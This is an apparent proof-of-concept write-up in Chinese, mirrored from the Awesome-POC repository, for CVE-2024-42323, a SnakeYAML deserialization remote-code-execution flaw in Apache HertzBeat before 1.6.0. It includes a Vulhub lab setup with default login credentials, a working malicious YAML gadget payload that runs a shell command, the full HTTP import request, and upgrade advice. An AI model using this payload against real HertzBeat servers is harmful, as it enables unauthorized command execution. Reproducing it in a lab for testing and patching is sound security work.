admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323.md
Threekiii a53d4b2083 update
2025-05-26 15:47:04 +08:00

81 lines
3.6 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323
## 漏洞描述
Apache HertzBeat 是一款开源的实时监控告警工具,支持对操作系统、中间件、数据库等多种对象进行监控,并提供 Web 界面进行管理。
在 1.6.0 版本之前HertzBeat 使用了存在安全漏洞的 SnakeYAML 库来解析 YAML 文件。当已认证用户通过 `/api/monitors/import` 或 `/api/alert/defines/import` 接口导入新的监控类型时,可以提供特制的 YAML 内容触发不受信任数据的反序列化,最终可能导致在目标系统上执行远程代码。
参考链接:
- https://forum.butian.net/article/612
- https://lists.apache.org/thread/dwpwm572sbwon1mknlwhkpbom2y7skbx
## 漏洞影响
```
Apache HertzBeat < 1.6.0
```
## 环境搭建
Vulhub 执行如下命令启动存在漏洞的 HertzBeat 1.4.4 服务器:
```
docker compose up -d
```
服务启动后,访问 `http://your-ip:1157/dashboard` 进入 HertzBeat 控制面板。默认登录凭据为:
- 用户名:`admin`
- 密码:`hertzbeat`
![](images/Apache%20HertzBeat%20SnakeYaml%20反序列化远程代码执行漏洞%20CVE-2024-42323/image-20250311090855824.png)
## 漏洞复现
首先,准备一个恶意 YAML 文件,文件名必须以 `.yaml` 结尾,内容如下:
```yaml
!!org.h2.jdbc.JdbcConnection [ "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if exists exec\\;CREATE ALIAS EXEC AS $$void exec() throws java.io.IOException { Runtime.getRuntime().exec(\"touch /tmp/awesome_poc\")\\; }$$\\;CALL EXEC ()\\;", [], "a", "b", false ]
```
然后登录 HertzBeat 后台,导航到任意监控页面并找到导入按钮,在这里将上面的恶意 YAML 文件导入:
![](images/Apache%20HertzBeat%20SnakeYaml%20反序列化远程代码执行漏洞%20CVE-2024-42323/image-20250311090950864.png)
HertzBeat 对 YAML 文件进行反序列化时,触发远程代码执行:
```
POST /api/monitors/import HTTP/1.1
Host: your-ip:1157
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Origin: http://your-ip:1157
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6788.76 Safari/537.36
Accept: application/json, text/plain, */*
Referer: http://your-ip:1157/monitors
sec-ch-ua-platform: "Windows"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvl3ne8kWpIEZzrNr
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInppcCI6IkRFRiJ9.eJw1jMsKwjAQRf9l1h0wj8akvyIuMs4I8dFKJhVB_HdT0OU593LecGkFJjjFwMLkMPlzQp8dY2S3QwqUKFg23hIMoCv1c-Z7mTsV1U66VplFFdtylRlV6lPqtuYGk9l7E8bReTuAvB5_EdMm6nKTXjj8gsfPF5W5Kao.lj6IwR1vmaTc2T0t2VJlwOCTMJeu4tlOejqygKjtlHV-vj2Ew2Cw5ljUv-9pGxDB_yKnfrKp89i4QhYoQAs8vA
Content-Length: 456
------WebKitFormBoundaryvl3ne8kWpIEZzrNr
Content-Disposition: form-data; name="file"; filename="test.yaml"
Content-Type: application/x-yaml
!!org.h2.jdbc.JdbcConnection [ "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if exists exec\\;CREATE ALIAS EXEC AS $$void exec() throws java.io.IOException { Runtime.getRuntime().exec(\"touch /tmp/awesome_poc\")\\; }$$\\;CALL EXEC ()\\;", [], "a", "b", false ]
------WebKitFormBoundaryvl3ne8kWpIEZzrNr--
```
![](images/Apache%20HertzBeat%20SnakeYaml%20反序列化远程代码执行漏洞%20CVE-2024-42323/image-20250311091514662.png)
命令成功执行:
![](images/Apache%20HertzBeat%20SnakeYaml%20反序列化远程代码执行漏洞%20CVE-2024-42323/image-20250311091629839.png)
## 漏洞修复
目前官方已有可更新版本,建议受影响用户升级至最新版本 Apache Hertbeat >= 1.6.0。官方下载地址: https://hertzbeat.apache.org/zh-cn/docs/download/
Reference in New Issue View Git Blame Copy Permalink